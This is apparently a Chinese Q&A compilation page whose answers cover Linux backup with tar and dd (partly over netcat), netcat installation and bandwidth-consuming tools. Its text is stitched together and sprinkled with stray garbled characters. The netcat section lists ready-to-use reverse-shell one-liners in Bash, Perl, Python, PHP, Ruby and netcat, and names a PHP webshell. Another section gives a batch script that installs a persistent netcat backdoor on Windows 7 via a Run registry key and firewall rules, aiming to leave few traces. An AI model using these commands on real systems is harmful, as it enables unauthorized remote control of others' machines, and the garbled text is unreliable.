Ⅰ 如何備份redhat linux系統
備份linux系統,不像Windows,Linux不限制根用戶存孝頌唯取任何東西,因此,你完全可以把一個分區上每一個的文件放入一個TAR文件中。來實施這一方法,用這個成為根用戶:
sudo su
接著去你的文件系統的根目錄(在我們的例子中,我們使用它,不過你可以去你希望備份的任何地方,包括遠程或可移動驅動器。)
cd /
然後,下面就是我用來備份我的系統的完整的命令:
tar cvpzf backup.tgz / --exclude=/proc --exclude=/lost+found --exclude=/backup.tgz --exclude=/mnt --exclude=/sys
接著,讓我們稍微解釋一下:
很明顯,'tar'部分就是我們將要使用的軟體。
'cvpfz'是我們給tar加的選項,像「創建一個壓縮文檔」(這是顯然的),「保存許可權」(以便使每一個相同的文件有相同的許可權),以及「gzip」(縮減大小)。
接下來巧培,是壓縮文檔將獲得的名稱,在我們的例子中是backup.tgz。
緊隨其後的是我們想要備份的根目錄。既然我們想備份所有東西:/
接著就是我們要剔除的目錄了。我們不想備份每一樣東西,因為包括有些目錄不是非常有用。同時確保你沒有把備份文件本身也加進去了,否則,你會得到怪異的結果的。你也許同樣不打算把/mnt文件夾包括進來——如果你在那兒掛載了其他分區——否則最終你會把那些也備份的。同時確保你沒有任何東西掛載在 /media(即沒有掛載任何cd或可移動介質)。否則,剔除/media。
如果你想排除所有的其他分區,你可以使用 'l' 參數代替 --exclude, 上面的命令看起來象這樣:
tar cvpzlf backup.tgz / --exclude=/lost+found --exclude=/backup.tgz
按:kvidell在論壇主題里建議也剔除/dev目錄。不過,我有其他證據表明這樣做是不明智的。
好了,如果命令適合你的話,敲擊確定鍵(或者回車鍵,管它叫什麼名字),然後什麼都不用干,放鬆一下。備份也許會花上一段時間。
完了以後,在你的文件系統的根目錄會有一個叫作backup.tgz的文件——很可能相當巨大。現在你可以把燒錄到DVD上,或者移動到另一台機器,你可以做任何你想做的事情。
按2:在進程的最後,你也許會得到一條信息,寫著「tar:由於先前錯誤的耽擱而存在錯誤」或者其他什麼,不過大多數情況下你可以僅僅忽略它。
作為選擇,你可以使用Bzip來壓縮你的備份。這意味著較高的壓縮比但是也意味著較低的速度。如果壓縮比對你很重要,只需用「j」替換命令中的「z」, 同時給備份命一個相應的擴展名。這些會使命令變成這樣:
tar cvpjf backup.tar.bz2 / --exclude=/proc --exclude=/lost+found --exclude=/backup.tar.bz2 --exclude=/mnt --exclude=/sys
2.1. 通過網路備份如果空白的文件系統太少了並且你又不能掛載其它的文件系統來保存備份文件,你有可能使用 netcat 來完成備份.
在接受端你必須設置 netcat 用於寫備份文件,象這樣:
nc -l -p 1024 > backup.tar.bz2
然後你傳送 tar 命令,不帶 'f' 參數通過 netcat 在發送端,象這樣:
tar cvpj / | nc -q 0 1024
在上面的命令中 1024 僅僅是一個隨機的埠號, 任何從 1024 或以上的都可以工作.
如果安全的通過網路備份不依賴文件系統完成備份. 事櫻搏實上一個真正快的網路比寫備份文件到磁碟要快.
在上面的講述中 (由於我剛剛發呆,因此我不能證實它是可靠的) 是這個命令:
tar cvpj / | ssh "cat > backup.tar.bz2"
3. 恢復警告:看在上帝的份上,在這一部分請小心謹慎。如果你不理解你在這里幹了什麼,你可能最終毀壞了對你而言很重要的東西,所以請小心謹慎。 那麼,我們將緊接著上一章的例子:在分區的根目錄下的backup.tgz文件
再一次確保你是根用戶以及備份文件在文件系統的根目錄。
Linux美妙的地方之一就是這一項工作甚至可以在一個正在運行的系統上進行;沒必要被引導cd或者任何東西搞得暈頭轉向。當然,如果你使你的系統無法被引導了。你也許別無選擇,只能使用一張live-cd了,但是結果是一樣的。你甚至可以在Linux系統正在運行的時候,移除它裡面所有文件。可是我不告訴你那個命令!
好了,言歸正傳。這是我要用的命令:
tar xvpfz backup.tgz -C /
如果你使用 bz2
tar xvpfj backup.tar.bz2 -C /
警告:這會把你分區里所有文件替換成壓縮文檔里的文件!
只要敲一下確定/回車/你的兄弟/隨便什麼,然後去看焰火吧。同樣,這會花一段時間。等它完成了,你就有了一個完全恢復的Ubuntu系統!只需確保在你做其他任何事情之前,重新創建你剔除的目錄:
mkdir proc mkdir lost+found mkdir mnt mkdir sys etc...
當你重啟以後,所以的事情都會和你備份的時候一模一樣。
3.1. 恢復 GRUB那麼,如果你想把你的系統移動到一塊新硬碟上,或者,你想對你的GRUB做一些糟糕的事情(比方說,安裝Windows),你也將需要重裝GRUB。在這個論壇里,有不少如何做這個的非常好的指導,所以我不會從頭重新做起。相反,看一下這里(論壇) 或者這兒:
在這個論壇主題中,提出了一些方法。我個人建議第二個,remmelt貼出來的,因為我發現它每次都管用。
對,就是那個!我希望它有幫助!
4. 其他方法也許你也想看一下這些能幫助你自動備份系統的程序
Partimage
Mondo Rescue
Ⅱ Linux怎麼備份與還原
備份
將本含鏈地的/dev/hdx整盤備份到/dev/hdy :dd if=/dev/hdx of=/dev/hdy
將/dev/hdx全盤數據備份到指定路徑的image文件:dd if=/dev/hdx of=/path/to/image
備份/dev/hdx全盤數據,並利用gzip工具進行壓縮,保存到指定路徑祥老辯:dd if=/dev/hdx | gzip
>/path/to/image.gz
恢復
將備份文件恢復到指定盤:dd if=/path/to/image of=/dev/hdx
將壓縮的備份文件恢復到指定盤 :gzip -dc /path/to/image.gz | dd of=/dev/hdx
利用netcat遠程備份
在源主機上執行此命令備份/dev/hda:dd if=/dev/hda bs=16065b | netcat
< targethost-IP >
1234在目的主機上執行此命令來接收數據並寫入/dev/hdc:netcat -l -p 1234 | dd
of=/dev/hdc
bs=16065b
以下兩條指令是目的主機指令的變化分別採用bzip2 gzip對數據進行壓縮,並將備份文件保存在當
前目錄 :
netcat -l -p 1234 | bzip2 > partition.img
netcat -l -p 1234 | gzip > partition.img
備份MBR
備謹缺份:
備份磁碟開始的512Byte大小的MBR信息到指定文件:dd if=/dev/hdx of=/path/to/image
count=1 bs=512
恢復:
將備份的MBR信息寫到磁碟開始部分:dd if=/path/to/image of=/dev/hdx
備份軟盤
將軟碟機數據備份到當前目錄的disk.img文件:dd if=/dev/fd0 of=disk.img count=1
bs=1440k
Ⅲ linux怎麼安裝netcat
etcat-0.7.1.tar.gz
然後當然是解壓了
tar zxvf netcat-0.7.1.tar.gz
解壓完畢之後會生成目錄,要cd進去
cd netcat-0.7.1
然後進行編譯前的配置。
./configure
配置完了之後就可以make編譯了。
編譯成功就生成了netcat可執行的文件了,位於src目錄,cd進去進行運行./netcat -h.如圖
本地Windows監聽
nc -vv -l -p 1234
遠程Windows轉發
nc -t -e C:\WINDOWS\system32\cmd.exe 8.8.8.8 1234
遠程Linux轉發
./netcat 8.8.8.8 1234 -e /bin/sh
ReverseShell.c
ReverseShell.pl
ReverseShell.py
phpspy.php
———————NetCat for linux 參數e————————-
下載netcat-0.7.1.tar.gz
tar zxvf netcat-0.7.1.tar.gz
cd netcat-0.7.1
./configure
make
cd src
./netcat -h
——————————————————————–
一句話反彈命令
[Bash]
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
[PERL]
perl -e 『use Socket;$i=」10.0.0.1″;$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(「tcp」));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,」>&S」);open(STDOUT,」>&S」);open(STDERR,」>&S」);exec(「/bin/sh -i」);};』
[python]
python -c 『import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((「10.0.0.1″,1234));os.p2(s.fileno(),0); os.p2(s.fileno(),1); os.p2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);』
[PHP]
php -r 『$sock=fsockopen(「10.0.0.1″,1234);exec(「/bin/sh -i <&3 >&3 2>&3″);』
[Ruby]
ruby -rsocket -e』f=TCPSocket.open(「10.0.0.1″,1234).to_i;exec sprintf(「/bin/sh -i <&%d >&%d 2>&%d」,f,f,f)』
[Netcat]
nc -e /bin/sh 10.0.0.1 1234
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
Ⅳ 如何在Windows,Linux中安裝後門
0×00 准備工作
假設用戶以管理員許可權登錄系統,在Windows 7系統上使用netcat 創建一個後門。
Netcat 功能比較單一, 缺少了許多我們滲透工作中需要的功能。為此我們將創建一個攜帶型的工具包來解決這個問題 :
1.下載額外的文件和附加持續.
2.編輯修改指定文件.
3.快速創建執行後門.
4.控制遠程伺服器並進行惡作劇 :)
為了便於你第一時間獲取到你的工具包,你需要將它放置在一個獨立的U盤或者在線伺服器上。
攜帶型工具(Portable Applications)
攜帶型工具是那些不需要安裝就能直接使用的程序,它們往往將所有的執行環境和核心程序本身一同打包成一個獨立的文件,方便攜帶。在獨立文件執行的過程中會自行釋放額的需求文件,並構建一個可順利執行目標程序的環境。
1.不依賴特定的dll(dll已經打包)
2.不依賴注冊表設置(有可能自行初始化) ,不遺留下任何注冊表操作痕跡
3.操作痕跡最小化,盡量避免一切不必要的操作,導致留下過多的系統操作記錄
創建 Windows 7 工具集
gVim (跨平台的文本編輯器, 提供強大的命令行操作交互)
Wget (下載 windows 64 位版本)
Netcat
有Kali系統的可以用命令 「find / -name nc.exe」搜索到 http://www.kali.org/ 或者下載已經編譯好的版本 http://joncraton.org/blog/46/netcat-for-windows/
0×01初試 Netcat 後門
nc.exe -dLp 449 -e cmd.exe -L 這個選項會開啟一個監聽服務並等待客戶端連接, 在客戶端連接成功之後,會提供相應的交互服務。
– p 指定程序監聽的埠(非管理員許可權只能設置高於1024的埠. 同時不可復用現有埠)
– e 在接收到一個客戶端連接後, 會執行一個特定的程序(這里是cmd.exe), 這個程序負責接下來的會話交互(執行客戶端後期提交的任何命令)
– d 採取靜默監聽模式,避免nc運行過程中,產生過多額外的日誌信息
Windows 7 後門安裝批處理腳本
@echo off
Rem 拷貝文件到系統目錄
x "%systemdrive%\%username%\Desktop\nc.exe" "C:
\Windows\System32\" -y
Rem 修改注冊表,增加後門自啟動代碼.
reg add "HKLM\software\microsoft\windows\currentversion\run" /f /v "system" /t
REG_SZ /d "C:\windows\system32\nc.exe -Ldp 449 -e cmd.exe"
Rem 添加防火牆規則,開放監聽的449埠,允許外部連接.
netsh advfirewall firewall add rule name="Rule 34" dir=in action=allow
protocol=UDP localport=449
netsh advfirewall firewall add rule name="Rule 35" dir=in action=allow
protocol=TCP localport=449
Rem 添加防火牆規則,允許nc.exe對外提供連接.
netsh advfirewall firewall add rule name="Allow Messenger" dir=in action=allow
program="C:\windows\system32\nc.exe"
Ⅳ linux如何消耗網路流量
在 Linux 中,可以使用多種方式消耗網路流量。以下是一些常見的方法:
下載文件:下載文件是一種消耗網路流量的常見方式。您可以使用命令行下載工具,如 wget、curl,也可以使用圖形界面下載工具,如 Firefox 或 Chrome 等瀏覽器。
視頻和音頻流:流媒體服務是消耗網路流量的主要來源之一。您可以通過視頻網站、音樂網站或在線廣播等方式消耗網路流量。
網路游戲:網路游戲也是一種消耗網路流量的方式。多人在線游戲、網路競技游戲等都需要大量的網路帶寬。
P2P 文件共享:使用 P2P 文件共享軟體,如 BitTorrent,可以從其他用戶下載文件,同時也會消耗一定的網路流量。
雲服務:使用雲服務,如雲存儲、雲計算等,也需要消耗網路流量。
常用的一些命令行:
iperf:iperf 是一款功能強大的網路測速工具,可以通過 TCP 或 UDP 進行測試,並且可以設定不同的數據包大小、傳輸速度等參數。
wget:wget 是一款常用的命令行下載工具,可以通過下載猛友態大文件或多個小文件的方式持續消耗網路帶寬。
curl:curl 是一款功能強大的命令行網路工具,可以用於向 Web 伺服器發送 HTTP 請求,通過下載網頁或數據的方式持續消耗網路帶寬。
netcat:netcat 是一款多功能的命令行網路工告運具,可以用於創建 TCP 或 UDP 連接,並且可以設定不同的數據包大小和傳輸速度。
這些工具都可以通過不同的參數設置,來實現持續消耗網路帶寬的目的。例如,您可以設置傳輸速度、數據包大小等參數,以達到消耗網路帶寬的效果。
需要注意的是,如果您想測試運營商寬頻是否達標,可以考慮使用專業的網路測速工枝源具,如 speedtest.net 等。這些工具可以提供更精確和全面的測速結果,並且可以檢測帶寬、延遲等多個指標,以更好地評估網路服務質量。